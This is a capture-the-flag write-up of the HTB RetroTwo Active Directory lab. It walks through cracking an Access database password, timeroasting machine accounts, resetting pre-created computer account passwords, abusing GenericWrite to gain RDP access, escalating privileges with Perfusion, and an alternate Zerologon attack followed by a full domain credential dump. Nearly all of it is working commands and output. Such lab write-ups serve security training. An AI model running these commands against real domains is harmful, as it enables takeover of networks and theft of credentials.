Post

HTB RetroTwo CTF Writeup

A password-protected MS Access database in a public SMB share is cracked with office2john, revealing LDAP credentials. Timeroasting yields crackable hashes for pre-created computer accounts (FS01$, FS02$). GenericWrite over ADMWS01$ is abused to change its password, add a user to the RDP group, and gain access; privilege escalation on the legacy Windows Server 2008 host uses the Perfusion exploit (RpcEptMapper registry key abuse).

HTB RetroTwo CTF Writeup

HTB RetroTwo CTF

SMB Server Enumeration

Allows for guest login

1
2
3
4
5
6
7
8
9
10
11
12
$ nxc smb 10.129.247.250 -u 'guest' -p '' --shares
SMB         10.129.247.250  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.247.250  445    BLN01            [+] retro2.vl\guest: 
SMB         10.129.247.250  445    BLN01            [*] Enumerated shares
SMB         10.129.247.250  445    BLN01            Share           Permissions     Remark                                                                                
SMB         10.129.247.250  445    BLN01            -----           -----------     ------                                                                                
SMB         10.129.247.250  445    BLN01            ADMIN$                          Remote Admin                                                                          
SMB         10.129.247.250  445    BLN01            C$                              Default share                                                                         
SMB         10.129.247.250  445    BLN01            IPC$                            Remote IPC                                                                            
SMB         10.129.247.250  445    BLN01            NETLOGON                        Logon server share                                                                    
SMB         10.129.247.250  445    BLN01            Public          READ            
SMB         10.129.247.250  445    BLN01            SYSVOL                          Logon server share

I connected to the public share and grabbed a interesting file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ smbclient -U guest //retro2.vl/Public
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug 17 10:30:37 2024
  ..                                  D        0  Sat Aug 17 10:30:37 2024
  DB                                  D        0  Sat Aug 17 08:07:06 2024
  Temp                                D        0  Sat Aug 17 07:58:05 2024

                6290943 blocks of size 4096. 821256 blocks available
smb: \> cd DB
lssmb: \DB\> ls 
  .                                   D        0  Sat Aug 17 08:07:06 2024
  ..                                  D        0  Sat Aug 17 08:07:06 2024
  staff.accdb                         A   876544  Sat Aug 17 10:30:19 2024
ls -la 
                6290943 blocks of size 4096. 821256 blocks available
smb: \DB\> ls -la 
NT_STATUS_NO_SUCH_FILE listing \DB\-la
smb: \DB\> get staff.accdb
getting file \DB\staff.accdb of size 876544 as staff.accdb (124.7 KiloBytes/sec) (average 124.7 KiloBytes/sec)
smb: \DB\>

I searched google about .accdb file extension, and found that it’s related to a Microsoft Access database.

I downloaded **mdbtools **to my machine to try and poke around with the accdb file, but it was failing to identify that it’s a valid MS access database file.

I transfered the file to my Windows machine and had a surprise trying to open it:

image.webp

It requires a password.

To crack the password, I knew I had to use john, but was not finding any converter related to ACCDB, so I resorted to google.

After a few minutes researching, I found this github issue: https://github.com/openwall/john/issues/2597

Where they talk about recovering the password specifically for accdb, so It’s my lucky day. They suggest using “office2john” to proceed:

image.webp

So I did that, and it worked:

1
2
$ python3 office2john.py ~/hacking/htb/machines/easy/retrotwo/loot/staff.accdb 
staff.accdb:$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235

I saved the hash to a file and began cracking it with john, to obtain the cleartext password just a few seconds later:

1
2
3
4
5
6
7
8
9
10
11
$ ./john ~/hacking/htb/machines/easy/retrotwo/loot/staff.hash --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 SSE4.1 4x / SHA512 128/128 SSE4.1 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
class08          (staff.accdb)     
1g 0:00:00:24 DONE (2025-09-24 05:31) 0.04008g/s 185.2p/s 185.2c/s 185.2C/s notebook..monmon
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Credentials:

1
staff.accdb:class08

I opened the file in MS access, and discovered valid credentials for a user:

image.webp

Specifically

1
retro2\ldapreader:ppYaVcB5R

LDAP Enumeration

Some computers, which is odd:

1
2
3
4
5
6
7
8
$ nxc ldap 10.129.247.250 -u ldapreader  -p ppYaVcB5R --computers
LDAP        10.129.247.250  389    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 (name:BLN01) (domain:retro2.vl) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.247.250  389    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R
LDAP        10.129.247.250  389    BLN01            [*] Total records returned: 4
LDAP        10.129.247.250  389    BLN01            BLN01$
LDAP        10.129.247.250  389    BLN01            ADMWS01$
LDAP        10.129.247.250  389    BLN01            FS01$
LDAP        10.129.247.250  389    BLN01            FS02$

I tried performing a timeroast attack and succeeded against the machine using netexec:

1
2
3
4
5
6
7
8
$ nxc smb 10.129.247.250 -u ldapreader -p ppYaVcB5R -M timeroast 
SMB         10.129.247.250  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.247.250  445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R
TIMEROAST   10.129.247.250  445    BLN01            [*] Starting Timeroasting...
TIMEROAST   10.129.247.250  445    BLN01            1001:$sntp-ms$6f394a47e46214b1b9f69aeed156c8f4$1c0111fa00000000000a0f0d4c4f434cec7e3176627933c8e1b8428bffbfcd0aec7e400a69a435d4ec7e400a69a435d4                                                            
TIMEROAST   10.129.247.250  445    BLN01            1131:$sntp-ms$96e8c8e5c65cfbc3c2d81ffc58315937$1c0111fa00000000000a0f0d4c4f434cec7e317662866f1ae1b8428bffbfcd0aec7e400b75368fdfec7e400b75368fdf                                                            
TIMEROAST   10.129.247.250  445    BLN01            1127:$sntp-ms$067a51414777ac5e483bd6ae65a29eb1$1c0111fa00000000000a0f0d4c4f434cec7e3176625f1b18e1b8428bffbfcd0aec7e400b7138319fec7e400b7138319f                                                            
TIMEROAST   10.129.247.250  445    BLN01            1132:$sntp-ms$8c4de506ccadd253f1da50d2016fe6bf$1c0111fa00000000000a0f0d4c4f434cec7e317662866f1ae1b8428bffbfcd0aec7e400b75368fdfec7e400b75368fdf

I saved all of the hashes to a file like this:

1
2
3
4
$sntp-ms$8c4de506ccadd253f1da50d2016fe6bf$1c0111fa00000000000a0f0d4c4f434cec7e317662866f1ae1b8428bffbfcd0aec7e400b75368fdfec7e400b75368fdf
$sntp-ms$067a51414777ac5e483bd6ae65a29eb1$1c0111fa00000000000a0f0d4c4f434cec7e3176625f1b18e1b8428bffbfcd0aec7e400b7138319fec7e400b7138319f
$sntp-ms$96e8c8e5c65cfbc3c2d81ffc58315937$1c0111fa00000000000a0f0d4c4f434cec7e317662866f1ae1b8428bffbfcd0aec7e400b75368fdfec7e400b75368fdf
$sntp-ms$6f394a47e46214b1b9f69aeed156c8f4$1c0111fa00000000000a0f0d4c4f434cec7e3176627933c8e1b8428bffbfcd0aec7e400a69a435d4ec7e400a69a435d4

And used hashcat (latest 7.0 version) to crack it (using the best66 rule):

1
2
3
4
PS > .\hashcat.exe ..\hashes\htb\retrotwo-timeroast.txt ..\rockyou.txt -d 1 -m 31300 -r .\rules\best66.rule
hashcat (v7.0.0) starting

<SNIP>

Credentials:

1
2
$sntp-ms$8c4de506ccadd253f1da50d2016fe6bf$1c0111fa00000000000a0f0d4c4f434cec7e317662866f1ae1b8428bffbfcd0aec7e400b75368fdfec7e400b75368fdf:fs02
$sntp-ms$96e8c8e5c65cfbc3c2d81ffc58315937$1c0111fa00000000000a0f0d4c4f434cec7e317662866f1ae1b8428bffbfcd0aec7e400b75368fdfec7e400b75368fdf:fs01

The passwords are indeed correct, as you can see from the error message when trying to authenticate in SMB:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nxc smb 10.129.247.250 -u 'FS01$' -p fs01
SMB         10.129.247.250  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.247.250  445    BLN01            [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT


$ nxc smb 10.129.247.250 -u 'FS02$' -p fs02
SMB         10.129.247.250  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.247.250  445    BLN01            [-] retro2.vl\FS02$:fs02 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT


# Using a random password to see if the error message changes. It does!
$ nxc smb 10.129.247.250 -u 'FS02$' -p fs02123213
SMB         10.129.247.250  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.247.250  445    BLN01            [-] retro2.vl\FS02$:fs02123213 STATUS_LOGON_FAILURE

When we get the password right, it says:

1
STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

But when it’s wrong, it goes back to the normal message:

1
STATUS_LOGON_FAILURE

Bloodhound

We have an interesting chain when looking at members of the “remote desktop users” group:

image.webp

When looking at inbound object controls for the services group, I find it weird to see the machine account “admws01$” to have addmember and addself to the group.

image.webp

When looking at inbound object controls for admws01 machine account, another interesting thing happens:

image.webp

Our controlled “fs01$” and “fs02$” machine accounts are member of “domain computers” that have “GenericWrite” over the “admws01$” machine. We just have to figure out a way to change the password for either of the machine accounts, since it’s not possible to authenticate right now.

Changing the computer account password

I googled for the error message (STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT) and found a very, very useful article right away: https://trustedsec.com/blog/diving-into-pre-created-computer-accounts

Following the article’s explanation, I could change the password for the machine account using kpasswd.

First, I installed the necessary packages:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ sudo apt install krb5-user
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  krb5-config krb5-locales krb5-multidev libgssapi-krb5-2 libgssrpc4 libk5crypto3
  libkadm5clnt-mit12 libkadm5srv-mit12 libkdb5-10 libkrb5-3 libkrb5-dev
  libkrb5support0
Suggested packages:
  krb5-doc krb5-k5tls
The following NEW packages will be installed:
  krb5-config krb5-user
The following packages will be upgraded:
  krb5-locales krb5-multidev libgssapi-krb5-2 libgssrpc4 libk5crypto3
  libkadm5clnt-mit12 libkadm5srv-mit12 libkdb5-10 libkrb5-3 libkrb5-dev
  libkrb5support0
11 upgraded, 2 newly installed, 0 to remove and 155 not upgraded.
Need to get 1,124 kB of archives.
After this operation, 485 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y

Then I used netexec to generate the appropriate krb5.conf file for the environment, and moved it to its location at /etc/:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ nxc smb 10.129.247.250 -u 'ldapreader' -p ppYaVcB5R --generate-krb5-file krb5.conf 
SMB         10.129.247.250  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:False)
SMB         10.129.247.250  445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R



$ cat krb5.conf 

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = RETRO2.VL

[realms]
    RETRO2.VL = {
        kdc = bln01.retro2.vl
        admin_server = bln01.retro2.vl
        default_domain = retro2.vl
    }

[domain_realm]
    .retro2.vl = RETRO2.VL
    retro2.vl = RETRO2.VL



$ sudo mv krb5.conf /etc/

With the krb5.conf file set up, and the packages installed, I could change the password for the machine account:

1
2
3
4
5
$ kpasswd 'fs01$'
Password for [email protected]: 
Enter new password: 
Enter it again: 
Password changed.

Verifying the password has been actually changed with netexec:

1
2
3
4
5
6
7
8
9
10
11
12
$ nxc smb 10.129.247.250 -u 'fs01$' -p Password123 --shares 
SMB         10.129.247.250  445    BLN01            [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.129.247.250  445    BLN01            [+] retro2.vl\fs01$:Password123 
SMB         10.129.247.250  445    BLN01            [*] Enumerated shares
SMB         10.129.247.250  445    BLN01            Share           Permissions     Remark                                                                                
SMB         10.129.247.250  445    BLN01            -----           -----------     ------                                                                                
SMB         10.129.247.250  445    BLN01            ADMIN$                          Remote Admin                                                                          
SMB         10.129.247.250  445    BLN01            C$                              Default share                                                                         
SMB         10.129.247.250  445    BLN01            IPC$                            Remote IPC                                                                            
SMB         10.129.247.250  445    BLN01            NETLOGON        READ            Logon server share                                                                    
SMB         10.129.247.250  445    BLN01            Public          READ            
SMB         10.129.247.250  445    BLN01            SYSVOL          READ            Logon server share

Abusing GenericWrite

Since it’s a windows 2008 machine, many methods won’t work. I tried abusing shadow credentials using certipy shadow auto (to get the ntlm hash for the admws01$ machine but failed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
$ certipy -debug shadow auto -u 'fs01$' -p 'Password123' -target bln01.retro2.vl -dc-ip 10.129.247.250 -account 'admws01$' -ldap-scheme ldap
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[+] Nameserver: '10.129.247.250'
[+] DC IP: '10.129.247.250'
[+] DC Host: None
[+] Target IP: None
[+] Remote Name: 'bln01.retro2.vl'
[+] Domain: ''
[+] Username: 'FS01$'
[+] Trying to resolve 'bln01.retro2.vl' at '10.129.247.250'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: True (LDAP signing: True, SSL: False)
[+] Using channel binding signing: False (LDAP channel binding: True, SSL: False)
[+] LDAP NTLM authentication successful
[+] Bound to ldap://10.129.247.250:389 - cleartext
[+] Default path: DC=retro2,DC=vl
[+] Configuration path: CN=Configuration,DC=retro2,DC=vl
[*] Targeting user 'ADMWS01$'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '09068969e64e44839efdae410183ca51'
[-] Got error: invalid attribute type msDS-KeyCredentialLink
Traceback (most recent call last):
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/certipy/entry.py", line 73, in main
    actions[options.action](options)
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/certipy/commands/parsers/shadow.py", line 30, in entry
    shadow.entry(options)
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/certipy/commands/shadow.py", line 881, in entry
    actions[options.shadow_action]()
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/certipy/commands/shadow.py", line 360, in auto
    result = self.add_new_key_credential(target_dn, user)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/certipy/commands/shadow.py", line 240, in add_new_key_credential
    saved_key_credential = self.get_key_credentials(target_dn, user)
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/certipy/commands/shadow.py", line 112, in get_key_credentials
    results = self.connection.search(
              ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/certipy/lib/ldap.py", line 1060, in search
    entries = list(
              ^^^^^
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/ldap3/extend/standard/PagedSearch.py", line 56, in paged_search_generator
    result = connection.search(search_base,
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/hacking/tools/certipy-venv/lib/python3.12/site-packages/ldap3/core/connection.py", line 836, in search
    raise LDAPAttributeError(self.last_error)
ldap3.core.exceptions.LDAPAttributeError: invalid attribute type msDS-KeyCredentialLink

I used the net command to change the password for the machine account:

1
net rpc password 'ADMWS01$' Rogue1 -U retro2.vl/'fs01$'%Password123 -S bln01.retro2.vl

With access to the machine account, I could add my controlled user (ldapreader) to the “services” group to allow me to RDP into the machine:

1
$ bloodyAD -u 'admws01$' -p Rogue1 -d retro2.vl --dc-ip 10.129.247.250 add groupMember 'services' 'ldapreader'

I tried connecting to rdp right away and got error related to TLS:

1
2
$ xfreerdp /v:10.129.247.250 /u:ldapreader /p:ppYaVcB5R
[07:15:11:227] [26178:26179] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

So I added the tls-seclevel flag to disable security check for the tls tunnel:

1
$ xfreerdp /v:10.129.247.250 /u:ldapreader /p:ppYaVcB5R /tls-seclevel:0

Transfer Perfusion.exe to the machine (https://github.com/manesec/Pentest-Binary/blob/main/Perfusion.exe), execute it to get root:

1
PS C:\Users\ldapreader> .\Perfusion.exe -c cmd -i

Reference: https://itm4n.github.io/windows-registry-rpceptmapper-eop/

ALternate privesc

It’s posdible to get root right away in the machine by abusing zerologon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ python3 set_empty_pw.py bln01 10.129.242.54
Performing authentication attempts...
===============================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\xe3n\xb0AN\xfdsN' 
NegotiateFlags:                  556793855 
AccountRid:                      1001 
ErrorCode:                       0 


server challenge b'\xe3\x90\xbdno\xaaSb'
NetrServerPasswordSet2Response 
ReturnAuthenticator:            
    Credential:                     
        Data:                            b'\x01*\x8f\x909\xb6\x0e\xb3' 
    Timestamp:                       0 
ErrorCode:                       0 



Success! DC should now have the empty string as its machine password.

and then:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
$ secretsdump.py 'bln01$'@'bln01.retro2.vl'
Impacket v0.13.0.dev0+20250710.92041.bf2d749 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Julie.Martin:1105:aad3b435b51404eeaad3b435b51404ee:cf4999af837f40d72d1c5bcec27ba9b6:::
Clare.Smith:1106:aad3b435b51404eeaad3b435b51404ee:a7c82ec08414f0c54637fad20b9aac9e:::
Laura.Davies:1107:aad3b435b51404eeaad3b435b51404ee:ee74607fad6d8c51b0d488e322f82317:::
Rhys.Richards:1108:aad3b435b51404eeaad3b435b51404ee:09377f210fdbdcda6f97eda91ddc6879:::
Leah.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:6333c620221c04d8fb5b6d7ca8b6d6d7:::
Michelle.Bird:1110:aad3b435b51404eeaad3b435b51404ee:c823220a9bda3ca70ebe7362187c9004:::
Kayleigh.Stephenson:1111:aad3b435b51404eeaad3b435b51404ee:a78835f0139b3b206f9598fe9c18d707:::
Charles.Singh:1112:aad3b435b51404eeaad3b435b51404ee:432119e62a10aff8c8200e4f45e772a0:::
Sam.Humphreys:1113:aad3b435b51404eeaad3b435b51404ee:3c1508fc774de1e6040c68b41a17fdee:::
Margaret.Austin:1114:aad3b435b51404eeaad3b435b51404ee:c6ebda46b0b014eda3ffcb8d92d179d9:::
Caroline.James:1115:aad3b435b51404eeaad3b435b51404ee:80835fee4ce88524f63a0ecf60870ac0:::
Lynda.Giles:1116:aad3b435b51404eeaad3b435b51404ee:dbf17856bd378ec410c20b98a749571f:::
Emily.Price:1117:aad3b435b51404eeaad3b435b51404ee:9cdf1d59674a6ddfedef2ae2545d3862:::
Lynne.Dennis:1118:aad3b435b51404eeaad3b435b51404ee:4b690295089b91881633113f13c866ee:::
Alexandra.Black:1119:aad3b435b51404eeaad3b435b51404ee:3349f04c2fdcf796a66c37b2a7658ae6:::
Alex.Scott:1120:aad3b435b51404eeaad3b435b51404ee:200155446e3b3817e8bc857dfe01b58c:::
Mandy.Davies:1121:aad3b435b51404eeaad3b435b51404ee:c144842c62c3051b8f1b8467ec62ef1f:::
Marilyn.Whitehouse:1122:aad3b435b51404eeaad3b435b51404ee:097b5b5b97e2a3b07db0b3deac5cd303:::
Lindsey.Harrison:1123:aad3b435b51404eeaad3b435b51404ee:261b8b9c79b19345e8ea15dcdfc03ecd:::
Sally.Davey:1124:aad3b435b51404eeaad3b435b51404ee:78ac830ac29ae1df8fa569b39515d5a5:::
retro2.vl\inventory:1128:aad3b435b51404eeaad3b435b51404ee:46b019644dde01251e7044a3d4185bd1:::
retro2.vl\ldapreader:1130:aad3b435b51404eeaad3b435b51404ee:fe63aaefd1cfd29d7cc5c14321a725f3:::
BLN01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ADMWS01$:1127:aad3b435b51404eeaad3b435b51404ee:51057fef1dc8529a2c3176d2e922711b:::
FS01$:1131:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
FS02$:1132:aad3b435b51404eeaad3b435b51404ee:eb354224f433cd7cd824b1fdce8c0795:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f999387c6acf17efe592b3b81a98fa5255149d7cb03c12283954976fe00fd88f
Administrator:aes128-cts-hmac-sha1-96:dffd8094b8b89f586ad710441f19cfbd
Administrator:des-cbc-md5:c7629eeaa24c075d
krbtgt:aes256-cts-hmac-sha1-96:1de3d3d429521d8d99e4b4b31da5ce5f993902a8876adaabdd9449a5256c220f
krbtgt:aes128-cts-hmac-sha1-96:8250eee9083a48b1fca675d7d0ce3699
krbtgt:des-cbc-md5:d334438313291520
admin:aes256-cts-hmac-sha1-96:ad365110538ae05c11319d60ba5bd3f2d565d6de20bacdd7425074f08fd08d03
admin:aes128-cts-hmac-sha1-96:799b8d618cab31609e4ccb5506dee56b
admin:des-cbc-md5:344c45c75d1c4cab
Julie.Martin:aes256-cts-hmac-sha1-96:5428f080b3303d74da2a344d0b799d97dfb5795fee1d1ed64b3e7e9cc3cbec5c
Julie.Martin:aes128-cts-hmac-sha1-96:8757cfac9fd8af791bd8f5c9b8bfac0c
Julie.Martin:des-cbc-md5:0e85dca2e3e6291a
Clare.Smith:aes256-cts-hmac-sha1-96:65c7c8d4e980f1e63fab4af0fb8b8dc17e9bddff20e7b8bb5fa5c1690561f406
Clare.Smith:aes128-cts-hmac-sha1-96:54cc3c8caadcd6e9b605d2da4c96e55f
Clare.Smith:des-cbc-md5:61fe8f52b39ecb9d
Laura.Davies:aes256-cts-hmac-sha1-96:9ada131aebb330b859770d3177e4b6bf2e37e994d83761e83c296e3dd0549fa4
Laura.Davies:aes128-cts-hmac-sha1-96:c00363c7acdb7e6efb47e90c46eb73f5
Laura.Davies:des-cbc-md5:31d670ec9b16c762
Rhys.Richards:aes256-cts-hmac-sha1-96:805f8d2f3f6c92cbf7bf0fc2449ec03ac8446b0f595aeb68d5e34932bdf1f9a8
Rhys.Richards:aes128-cts-hmac-sha1-96:baeaf7d174ea76419d381e545935aef2
Rhys.Richards:des-cbc-md5:6b0e2cf7ae3de3e3
Leah.Robinson:aes256-cts-hmac-sha1-96:90848db193370cc832b199b27137ef581b78eddc2d5f635a0e01e0b1c514c326
Leah.Robinson:aes128-cts-hmac-sha1-96:6aa30b143db0f0e65517bb062a4fe6c7
Leah.Robinson:des-cbc-md5:d9b6abe30e851f9b
Michelle.Bird:aes256-cts-hmac-sha1-96:a76108bec6385a4469d5eff1d4d5ccaaf066b981d56d3df82f058c1b66b9c653
Michelle.Bird:aes128-cts-hmac-sha1-96:ca9fdc76c484d05397433e90c2d9b84c
Michelle.Bird:des-cbc-md5:79b016e69ec4b59b
Kayleigh.Stephenson:aes256-cts-hmac-sha1-96:6c11e6b4e5e263bbb7b6859b7e4380bf9fce222de2e51da9f033c370d1bd3b34
Kayleigh.Stephenson:aes128-cts-hmac-sha1-96:69ced3d12c16659ae2fdaa2bab6df2f3
Kayleigh.Stephenson:des-cbc-md5:ce7ae949452a1997
Charles.Singh:aes256-cts-hmac-sha1-96:0eb1f6abc867ac77603b9b6f8b454abfef421c6eec2518e28e0e40ee3efb6215
Charles.Singh:aes128-cts-hmac-sha1-96:3cee7675dd2615a5214127faacb30930
Charles.Singh:des-cbc-md5:9125dcd6d3ad4fb6
Sam.Humphreys:aes256-cts-hmac-sha1-96:878ea36ddce6a9e5b050021e757669ff94b8b3367bcb9461dc83cdbcc1342b77
Sam.Humphreys:aes128-cts-hmac-sha1-96:102e420c74d34cda602282342c555b72
Sam.Humphreys:des-cbc-md5:5b5bc1a8683816c4
Margaret.Austin:aes256-cts-hmac-sha1-96:500b6f66a68c384b76ee63fb2d309278638c4eaa2903a7555b7f0a63ed2da30e
Margaret.Austin:aes128-cts-hmac-sha1-96:2bb2066bea0481bf7c9fae65a908bb64
Margaret.Austin:des-cbc-md5:077f91679bcb6dda
Caroline.James:aes256-cts-hmac-sha1-96:0ddabfe9574396df083878375b0e7100c4466698a1d0fa812a07b0bc17f44583
Caroline.James:aes128-cts-hmac-sha1-96:574766e01691af43749a8c0cc566af0f
Caroline.James:des-cbc-md5:29574998cd13f813
Lynda.Giles:aes256-cts-hmac-sha1-96:dc9ca6bdfd27960e9c5700864e0fec0a388f903747d79c61d773cc6e24ea2253
Lynda.Giles:aes128-cts-hmac-sha1-96:c2eaf2f31cb78d18ac51c1c8b0cd496d
Lynda.Giles:des-cbc-md5:62b9082f6e1ab92a
Emily.Price:aes256-cts-hmac-sha1-96:37d0c3e846f44b0c0afe005b178c1e2689ab8cf227c60345e4d83af3bedcd908
Emily.Price:aes128-cts-hmac-sha1-96:87331a1b619dc0b817a00bd7882973b3
Emily.Price:des-cbc-md5:d592c7dce0386489
Lynne.Dennis:aes256-cts-hmac-sha1-96:ec46f167dac2f0763fa4891b4ec7204e8b791b6e757b88f13eaf0a3069d91520
Lynne.Dennis:aes128-cts-hmac-sha1-96:a6de42302e21936f728c6340cc3924b4
Lynne.Dennis:des-cbc-md5:2337fe088083d561
Alexandra.Black:aes256-cts-hmac-sha1-96:63e7bcd8c3827fafac984927c8ee7a410644603b87df03a73d93a5d83d351199
Alexandra.Black:aes128-cts-hmac-sha1-96:f7f77113ff7a8e070f8d961a973afa80
Alexandra.Black:des-cbc-md5:70dcdcef4a584c67
Alex.Scott:aes256-cts-hmac-sha1-96:56e28035bf0e773b08eac63f2ded3b77150f4662335fecfe0d167439954c3c6c
Alex.Scott:aes128-cts-hmac-sha1-96:1743a9bfda5a6d4937e10833aa94261a
Alex.Scott:des-cbc-md5:c47a9e6475452f7c
Mandy.Davies:aes256-cts-hmac-sha1-96:f9ab0b0127d819088c6e20f2a22b62e658e65413634a982e7a03029860b5fbbb
Mandy.Davies:aes128-cts-hmac-sha1-96:775c402ad1b82a01d00d24cdce2f0cff
Mandy.Davies:des-cbc-md5:0dcb62cd49a4070b
Marilyn.Whitehouse:aes256-cts-hmac-sha1-96:070d0ec84b01cee1f4e6f7fde70978e38dd06e9718d29165f7b34687f2bfc57d
Marilyn.Whitehouse:aes128-cts-hmac-sha1-96:983446f761745cac59cfdf6533be1e62
Marilyn.Whitehouse:des-cbc-md5:b34fad80d6583d52
Lindsey.Harrison:aes256-cts-hmac-sha1-96:df8a640121c7931e4b1e24a903831bbdb2ceca342bc32df0d642be5ad59aebaa
Lindsey.Harrison:aes128-cts-hmac-sha1-96:9c0600e456143cb3a958434295e230c5
Lindsey.Harrison:des-cbc-md5:df4afde6a83d586d
Sally.Davey:aes256-cts-hmac-sha1-96:ad994860516e89a93515d9934fbc92ae0e18ac10a4179ce0b5e856d21239c07d
Sally.Davey:aes128-cts-hmac-sha1-96:1bd25ea0251be749c0b9ff10c0443728
Sally.Davey:des-cbc-md5:8940a2cde9fb45f1
retro2.vl\inventory:aes256-cts-hmac-sha1-96:251d2610ccb122fbefecbc0bad2a0f1ecffe39e48734d40fc31f9d6c32d9c3a6
retro2.vl\inventory:aes128-cts-hmac-sha1-96:6a4787b610d341b0d99758c8dd80a405
retro2.vl\inventory:des-cbc-md5:ad08041f6b0861a7
retro2.vl\ldapreader:aes256-cts-hmac-sha1-96:1f38605e159b9f10ba465530aa4ea2d9fd5429b3bf348fa8559b5acc647c0b32
retro2.vl\ldapreader:aes128-cts-hmac-sha1-96:000256e0522cc3cd2f52c6bfe1698368
retro2.vl\ldapreader:des-cbc-md5:8908762379fdfdae
BLN01$:aes256-cts-hmac-sha1-96:ffd22246332c76f0831bbae3acbcf7d9160e780f77ecbf6322ec536b8744a280
BLN01$:aes128-cts-hmac-sha1-96:00489881457ca7f5ba4dac2e1395fd44
BLN01$:des-cbc-md5:0886138c15a70157
